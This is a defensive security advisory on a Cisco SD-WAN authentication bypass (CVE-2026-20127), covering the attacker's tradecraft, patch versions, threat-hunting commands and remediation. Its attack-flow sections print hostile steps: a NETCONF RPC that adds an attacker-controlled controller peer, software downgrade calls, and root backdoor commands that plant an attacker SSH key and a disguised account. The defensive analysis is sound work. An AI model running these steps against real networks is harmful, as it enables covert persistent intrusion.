CVE-2026-20127 • Cisco SD-WAN • CVSS 10.0 • CISA ED 26-03

Phantom Peer: Cisco SD-WAN Zero-Day
Silently Exploited for Three Years

CVSS 10.0 Critical Auth Bypass Nation-State Actively Exploited CISA KEV Five Eyes
⚠ CISA Emergency Directive 26-03 — Federal Deadline: February 27, 2026

CVE-2026-20127 carries a maximum CVSS score of 10.0. CISA has issued Emergency Directive 26-03 requiring all Federal Civilian Executive Branch agencies to inventory all Cisco SD-WAN systems, collect forensic snapshots, apply patches, and hunt for signs of compromise by February 27, 2026 at 5:00 PM ET. The Five Eyes intelligence alliance — CISA, NSA, ACSC, CCCS, NCSC-NZ, and NCSC-UK — have jointly published a threat hunting guide for organizations to assess their exposure.

Overview

CVE-2026-20127 is a maximum-severity (CVSS 10.0) authentication bypass vulnerability in the peering mechanism of Cisco Catalyst SD-WAN Controller (formerly vSmart) and Cisco Catalyst SD-WAN Manager (formerly vManage). By sending specially crafted network requests, an unauthenticated remote attacker can bypass authentication, log in as a high-privileged internal user account, and gain access to the NETCONF API — the configuration backbone of the entire SD-WAN fabric.

The most alarming dimension of this vulnerability is not the flaw itself, but the gap between its exploitation and its discovery. When Cisco Talos researchers investigated a compromise at a victim organization in late 2025, they found that a sophisticated threat actor they now track as UAT-8616 had been exploiting this vulnerability since at least 2023 — operating undetected inside enterprise SD-WAN infrastructure for approximately three years. In that window, UAT-8616 injected a "rogue peer" that appeared as a legitimate SD-WAN network component, giving them persistent access to the organization's entire network overlay.

The combination of a zero-day with three years of silent exploitation, a state-sponsored threat actor, and targeting of the very infrastructure that controls how all corporate network traffic flows has led to a joint Five Eyes advisory and a CISA Emergency Directive — responses reserved for only the most severe active threat campaigns.

What Is Cisco Catalyst SD-WAN?

Cisco Catalyst SD-WAN (previously marketed as Viptela) is one of the world's most widely deployed software-defined wide area networking platforms. It enables enterprises, service providers, and government agencies to manage their entire WAN fabric — spanning branch offices, data centers, and cloud environments — from a centralized software controller. The key components are:

  • Catalyst SD-WAN Manager (vManage): The central orchestration and management plane. All network policies, device configurations, security settings, and analytics are managed here. Administrators interact with the entire SD-WAN deployment through this single pane of glass.
  • Catalyst SD-WAN Controller (vSmart): The control plane brain. vSmart runs the OMP (Overlay Management Protocol) that distributes routing policy and security information to all SD-WAN edge devices. It controls how traffic flows across the overlay network, including which routes are preferred and what traffic segmentation policies apply.
  • SD-WAN Edge Devices (vEdge/WAN Edge Routers): Physical or virtual routers at branch offices and data centers that form the data plane, forwarding traffic according to the policies distributed by vSmart.

Why does this matter for the severity of CVE-2026-20127? Because a compromised SD-WAN Controller or Manager does not just give an attacker one compromised device — it gives them a privileged vantage point over every branch office, data center, cloud connection, and network segment in the organization. They can see all SD-WAN traffic flows, manipulate routing, and add unauthorized devices to the fabric that look completely legitimate.

🌐 Scale of Deployment

Cisco Catalyst SD-WAN is deployed by thousands of enterprises and government agencies globally, including organizations in critical infrastructure sectors: energy, financial services, healthcare, defense, and government. The on-premises Controller and Manager deployments — the targets of CVE-2026-20127 — are particularly common in regulated industries that cannot use Cisco's cloud-hosted SD-WAN option.

Technical Details

The Authentication Bypass: CVE-2026-20127

The flaw resides in the peering authentication mechanism — the process by which Cisco SD-WAN components authenticate to each other when establishing control plane relationships. In a healthy SD-WAN deployment, the Controller and Manager authenticate connecting peers using certificate-based mutual TLS and OMP session establishment to prevent unauthorized devices from joining the SD-WAN fabric.

In CVE-2026-20127, this authentication mechanism is not functioning correctly. The underlying validation logic contains a flaw that can be triggered by specially crafted requests sent over the network, causing the system to skip or improperly complete the authentication sequence. The result: the attacker is logged in as a high-privileged, non-root internal user account — an account that legitimately exists within the SD-WAN software stack for internal component communication.

This authenticated session provides direct access to the NETCONF (Network Configuration Protocol) interface — an XML/RPC-based management API that is the primary programmatic interface for configuring Cisco SD-WAN devices. Through NETCONF, an attacker can:

  • Read the complete SD-WAN topology and configuration
  • Modify routing policies and traffic steering rules
  • Add new peers to the management and control planes
  • Create or modify user accounts and SSH keys
  • Initiate software upgrades or downgrades on SD-WAN devices

Critically, the affected component listens on the network by design — this is how the SD-WAN fabric communicates. There is no additional access required beyond network reachability to the Controller or Manager's management interface.

Conceptual Attack Flow — Recreated from Cisco Talos Analysis
# Step 1: Identify exposed Cisco SD-WAN Controller / Manager
# Management interface typically reachable on port 443 (HTTPS/NETCONF over TLS)
nmap -sV -p 443,830 <sdwan_controller_ip>

# Step 2: Craft malformed peering request to exploit auth bypass
# The flaw triggers when authentication sequence validation is incomplete
# Result: authenticated session as high-privileged internal user

# Step 3: Leverage NETCONF access to inject rogue peer
# Using NETCONF over SSH (RFC 6241) to modify fabric topology
ssh -s <sdwan_manager_ip> -p 830 netconf # authenticated via bypassed auth

<!-- NETCONF RPC: Add rogue controller peer to management plane -->
<rpc>
  <edit-config>
    <target><running/></target>
    <config>
      <!-- Inject attacker-controlled vSmart as legitimate peer -->
      <sdwan-system><controller-ip><attacker_c2_ip></controller-ip></sdwan-system>
    </config>
  </edit-config>
</rpc>

# Step 4: Rogue peer now appears as legitimate SD-WAN component
# UAT-8616 now has persistent access without needing the 0-day again

The Rogue Peer: Persistent Invisible Access

The injection of a rogue peer is the most operationally sophisticated aspect of UAT-8616's campaign. Once injected, the attacker-controlled device presents itself as a legitimate SD-WAN Controller or orchestrator component within the fabric. From this position, the rogue peer:

  • Maintains persistent access entirely within the legitimate-looking SD-WAN topology — no malware binary dropped on the compromised device is necessary for persistent connectivity.
  • Participates in OMP (Overlay Management Protocol), meaning it receives routing tables and policy updates from the real controllers, giving UAT-8616 a real-time map of the victim's entire network topology including segments, VPNs, and policies.
  • Intercepts or inspects traffic flowing through the overlay network — SD-WAN traffic traversing the fabric was visible to the rogue peer, enabling traffic analysis and potential data exfiltration at the network infrastructure layer.
  • Survives patches to the underlying CVE if not specifically hunted for and removed. The rogue peer relationship persists in the SD-WAN configuration independently of the authentication bypass vulnerability that created it.

The Privilege Escalation Chain: CVE-2022-20775

With NETCONF access as a high-privileged non-root user, UAT-8616 needed root access to establish deeper persistence on the Controller/Manager hosts. They achieved this using a remarkably clever technique involving the SD-WAN platform's own software update mechanism and a four-year-old privilege escalation vulnerability.

Privilege Escalation via Version Cycle (CVE-2022-20775)
# Phase 1: Downgrade to vulnerable software version via NETCONF
# Cisco SD-WAN Manager supports software version management via its management API
# UAT-8616 initiates downgrade to a version vulnerable to CVE-2022-20775
POST /dataservice/device/action/install
  {"version": "<vulnerable_version>", "deviceList": [...]}

# Phase 2: Exploit CVE-2022-20775 (CVSS 7.8)
# Privilege escalation in Cisco SD-WAN CLI via improper directory permissions
# Allows non-root user to write to restricted paths and escalate to root
# Details: insufficiently restricted CLI command, insufficient protections on config files

# Phase 3: Establish root-level persistence (backdoor user, SSH key, cron job)
echo 'attacker_pubkey' >> /root/.ssh/authorized_keys
useradd -r -s /bin/bash 'svc-monitor' # disguised as service account

# Phase 4: Upgrade back to original version — evidence of downgrade erased
POST /dataservice/device/action/install
  {"version": "<original_version>", "deviceList": [...]}

The version downgrade/upgrade cycle is a particularly elegant evasion technique. After the upgrade restores the original software version: the vulnerable version is no longer present on the device, version-based compliance checks pass normally, log entries for the downgrade may be attributed to routine maintenance, and CVE-2022-20775 has no surface to be detected on — the device looks exactly as it did before the compromise, except for the root-level persistence UAT-8616 established during the brief downgrade window.

Threat Actor: UAT-8616

Cisco Talos tracks the exploiting actor as UAT-8616 and assesses it with high confidence as a highly sophisticated cyber threat actor. While Cisco has not publicly attributed UAT-8616 to a specific nation-state, the operational characteristics strongly align with state-sponsored espionage rather than financially motivated crime:

  • Multi-year operational patience: UAT-8616 exploited CVE-2026-20127 for approximately three years without triggering detection. This level of operational discipline and patience is a hallmark of nation-state espionage programs, not cybercriminal operations optimizing for immediate financial return.
  • Deep Cisco SD-WAN expertise: Discovering a CVSS 10.0 zero-day in a complex networking platform, understanding the NETCONF API well enough to inject a rogue peer, and knowing to use the software update mechanism for privilege escalation all indicate a team with significant investment in Cisco SD-WAN research.
  • Network infrastructure focus: UAT-8616 targeted the network control plane rather than endpoints. This choice systematically avoids EDR/XDR tools deployed on workstations and servers, targeting instead the unmonitored infrastructure that those tools rely on for network connectivity.
  • Espionage-optimized tradecraft: The rogue peer approach is designed for long-term intelligence collection — passive network visibility — rather than destructive actions or ransomware deployment. This is consistent with nation-state intelligence objectives.
  • Critical infrastructure targeting: UAT-8616 demonstrated a pattern of targeting high-value organizations in critical infrastructure sectors including energy, defense, finance, and government — sectors of primary interest to state intelligence services.
⚠ The Network Infrastructure Blind Spot

Modern enterprise security stacks invest heavily in EDR/XDR on endpoints, SIEM correlation, and application-layer monitoring. Network infrastructure devices — routers, SD-WAN controllers, and orchestrators — are almost universally excluded from this monitoring. There is typically no agent deployed on a vSmart or vManage appliance, no behavioral analysis of NETCONF sessions, and no integrity monitoring of the SD-WAN fabric topology. UAT-8616 exploited this blind spot deliberately: by operating entirely within the network layer, their rogue peer was invisible to every EDR tool in the victim's environment.

Five Eyes Joint Advisory

The severity of UAT-8616's campaign and the scale of potential exposure prompted an unprecedented joint response from the Five Eyes intelligence alliance. Agencies from five nations co-authored a technical advisory and threat hunting guide:

  • CISA — Cybersecurity and Infrastructure Security Agency (United States)
  • NSA — National Security Agency (United States)
  • ACSC — Australian Cyber Security Centre (Australia)
  • CCCS — Canadian Centre for Cyber Security (Canada)
  • NCSC-NZ — National Cyber Security Centre (New Zealand)
  • NCSC-UK — National Cyber Security Centre (United Kingdom)

The ACSC published the threat hunting guide under ACSC Advisory 2026-003, co-authored by all partner agencies. The guide provides specific forensic procedures, log queries, and indicators for organizations to assess whether their SD-WAN infrastructure has been compromised.

CISA simultaneously issued Emergency Directive 26-03, directing all Federal Civilian Executive Branch (FCEB) agencies to:

  1. Inventory all Cisco Catalyst SD-WAN systems (Controller, Manager, and edge devices)
  2. Immediately collect forensic snapshots, configuration exports, and authentication logs
  3. Apply all available patches (or apply temporary mitigations where patches are not yet available)
  4. Conduct active threat hunting using the Five Eyes hunting guide
  5. Implement all recommended controls from Cisco's Catalyst SD-WAN Hardening Guide
  6. Report findings to CISA by the deadline

The issuance of an Emergency Directive — a mechanism CISA uses sparingly for only the most critical, actively exploited vulnerabilities — signals the intelligence community's view that UAT-8616's campaign is ongoing, widespread, and represents an active national security threat.

Affected Versions & Patches

Both CVE-2026-20127 and CVE-2022-20775 affect on-premises deployments of Cisco Catalyst SD-WAN Controller and Manager. The fix is available across current supported releases. Organizations on end-of-maintenance branches must migrate to a supported release:

Affected Versions and Fixed Releases
# Cisco Catalyst SD-WAN Controller and Manager

Prior to 20.9 → Migrate to fixed release (end of maintenance)
20.9.x → Fixed in 20.9.8.2 (estimated Feb 27, 2026)
20.11 → Upgrade to supported release (end of maintenance)
20.12.5.x → Fixed in 20.12.5.3
20.12.6.x → Fixed in 20.12.6.1
20.13 / 20.14 → Fixed in 20.15.4.2 (end of maintenance — migrate)
20.15.x → Fixed in 20.15.4.2
20.16 → Fixed in 20.18.2.1 (end of maintenance — migrate)
20.18.x → Fixed in 20.18.2.1

# NOTE: No workaround is available for CVE-2026-20127.
# Patching is the only remediation. Restrict management interface access in the interim.

Important: Cisco Catalyst SD-WAN Cloud-hosted environments (Cisco-managed, standard, managed, and FedRAMP setups) are also affected. Cloud-hosted customers should confirm with Cisco that their hosted environment has been patched.

Detection & Threat Hunting

Given the three-year dwell time, organizations should treat any unpatched SD-WAN infrastructure as potentially compromised and approach this as an incident response exercise, not a routine patch. Patching alone will not remove a rogue peer already injected or root-level persistence already established. The following commands and indicators should be used to hunt for UAT-8616 activity:

Authentication Log — Detect Unexpected SSH Key Auth (vManage / vSmart)
# Check for SSH public-key authentication from unexpected IPs
grep "Accepted publickey for vmanage-admin" /var/log/auth.log
grep "Accepted publickey" /var/log/auth.log | grep -v "<known_admin_ip>"

# Verify all authorized SSH keys — any unexpected entries are IOCs
cat /home/vmanage-admin/.ssh/authorized_keys
cat /root/.ssh/authorized_keys

# Check for unexpected user accounts (e.g., disguised as service accounts)
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd
getent passwd | grep -v "nologin\|false"
Rogue Peer Detection — Audit SD-WAN Fabric Topology
# Via vManage UI: Dashboard → Network Topology → Controllers
# Look for unexpected vSmart (Controller) peers or vManage connections

# Via vManage API: List all registered SD-WAN devices
curl -X GET "https://<vmanage_ip>/dataservice/device" \
  -H "Cookie: JSESSIONID=<session>" \
  | python3 -m json.tool | grep -E "deviceType|systemIp|host-name|reachability"

# CLI: List OMP peers on vSmart controller
show omp peers
show control connections

# Flag: Any controller or orchestrator IP not in your documented inventory
Software Version History — Detect Unauthorized Downgrade/Upgrade Cycle
# Check software version history on vManage for unauthorized changes
grep -E "install|upgrade|downgrade|software" /var/log/nms/vmanage-server.log

# Via vManage API: Software upgrade history
curl -X GET "https://<vmanage_ip>/dataservice/device/action/status" \
  -H "Cookie: JSESSIONID=<session>"

# Red flags:
# - Downgrade to an older version followed quickly by upgrade back to current
# - Software changes outside scheduled maintenance windows
# - Unexpected reboots in auth.log / system logs correlating with version changes
Splunk — Detect Anomalous NETCONF Sessions and SD-WAN API Activity
index=network sourcetype=cisco_sdwan
| search (action="install" OR action="software-upgrade" OR action="add-controller")
| eval suspicious=if(match(src_ip, "^<known_mgmt_subnets>"), "no", "YES")
| where suspicious="YES"
| table _time, src_ip, action, device, user, suspicious
| sort -_time

index=auth sourcetype=linux_secure host=vmanage* OR host=vsmart*
| search "Accepted publickey"
| stats count by src_ip, user, _time
| where NOT src_ip IN ("<known_admin_ips>")

Additional Indicators of Compromise

Based on the Cisco Talos investigation and Five Eyes advisory, the following are additional behavioral IOCs associated with UAT-8616:

  • Unexpectedly small or missing log files: UAT-8616 is known to truncate or manipulate log files to reduce forensic evidence. Unusually small /var/log/auth.log or nms/vmanage-server.log files with gaps in timestamps are highly suspicious.
  • Peering events outside maintenance windows: Any new control plane peer relationships established during non-maintenance periods warrant immediate investigation.
  • Unexpected outbound connections from management hosts: SD-WAN Manager and Controller appliances should have tightly defined outbound network behavior. Connections to external IP addresses not in your inventory represent a critical IOC.
  • Cron jobs with encoded commands: Check /etc/cron* and user crontabs for unfamiliar entries, particularly those using base64-encoded payloads.

Remediation

🚨 Patch + Hunt: Do Not Patch Only

Applying the patch for CVE-2026-20127 removes the authentication bypass. However, it does not remove a rogue peer already injected into the SD-WAN fabric, root-level persistence established via CVE-2022-20775, or unauthorized SSH keys installed on the appliance. A patched device can remain fully compromised. Treat this as a potential IR scenario and hunt for IOCs before and after patching.

  1. Restrict management interface access immediately. While preparing to patch, ensure the SD-WAN Controller and Manager management interfaces are not accessible from the internet. Access should be limited to authorized administrator IPs or a dedicated out-of-band management network. Never expose SD-WAN management to the public internet.
  2. Collect forensic artifacts before patching. Take configuration exports (vmanage-export), save a copy of all relevant logs (/var/log/auth.log, /var/log/nms/*.log), and export the full device inventory from vManage. These artifacts may be modified or unavailable after a software upgrade changes the log structure.
  3. Audit the SD-WAN fabric for rogue peers. Using the vManage UI and API, enumerate every Controller, Orchestrator, and edge device in the fabric and compare against your authorized device inventory. Any unrecognized peer must be treated as a rogue peer and removed. Document all OMP connections and control connections visible via show control connections.
  4. Apply patches. Upgrade to the fixed release for your software branch per the version table above. Prioritize SD-WAN Manager (vManage) and Controller (vSmart) systems first, as these are the directly exploited components. Apply Cisco Security Advisory cisco-sa-sdwan-autbyp-XXXXXX.
  5. Rotate all credentials and SSH keys. Reset admin passwords on vManage, rotate any API tokens, and audit all authorized_keys files for unexpected entries. Any key not explicitly placed by your team should be removed and investigated.
  6. Implement the Cisco Catalyst SD-WAN Hardening Guide. This includes disabling unnecessary management protocols, implementing role-based access control, enabling certificate-based device authentication, and configuring control policy to restrict which IP ranges are permitted to establish control plane peering.
  7. Deploy network monitoring on SD-WAN management traffic. Implement NetFlow or packet capture on the network segments carrying SD-WAN control plane traffic. Baseline normal OMP/NETCONF session behavior and alert on deviations.

Zero Trust Perspective

CVE-2026-20127 and the UAT-8616 campaign illustrate a fundamental gap in how most organizations apply Zero Trust principles: they apply them to users and applications but leave network infrastructure devices implicitly trusted. A Zero Trust architecture extended to SD-WAN infrastructure would have significantly limited the blast radius:

  • Device identity verification: Under Zero Trust, every device that joins the SD-WAN fabric should present a strong cryptographic identity (certificate) that can be independently verified. A rogue peer with an unrecognized certificate would be rejected, even if the auth bypass was successfully triggered.
  • Network micro-segmentation of management traffic: SD-WAN management and control plane traffic should be isolated on a dedicated out-of-band management network accessible only from specific, known administrator IPs. Zero Trust requires this boundary to be enforced at the network level, not just by policy.
  • Continuous behavioral monitoring: Zero Trust assumes breach. Continuous monitoring of NETCONF sessions, control plane peering events, and software version changes — with automated alerting on anomalies — would have surfaced UAT-8616's activity far earlier than three years.
  • Least-privilege NETCONF access: The internal high-privileged account obtained by exploiting CVE-2026-20127 had sweeping NETCONF permissions including the ability to add peers and initiate software upgrades. Zero Trust policy should enforce granular NETCONF RBAC, limiting each account to the minimum permissions required.
  • Immutable infrastructure logging: UAT-8616 manipulated logs on compromised appliances. Streaming all logs to an external, immutable SIEM in real-time — a Zero Trust best practice — would have preserved the forensic evidence the attackers tried to destroy.
💡 Key Takeaway

CVE-2026-20127 is a reminder that the most dangerous attackers do not enter through the front door. They study your infrastructure, find the components you trust implicitly and monitor least, and make themselves a quiet, permanent resident. SD-WAN infrastructure was that component for UAT-8616. The question for every security team is: what is your equivalent? Where are the systems in your environment that sit outside your monitoring stack, are implicitly trusted, and haven't been audited since they were installed?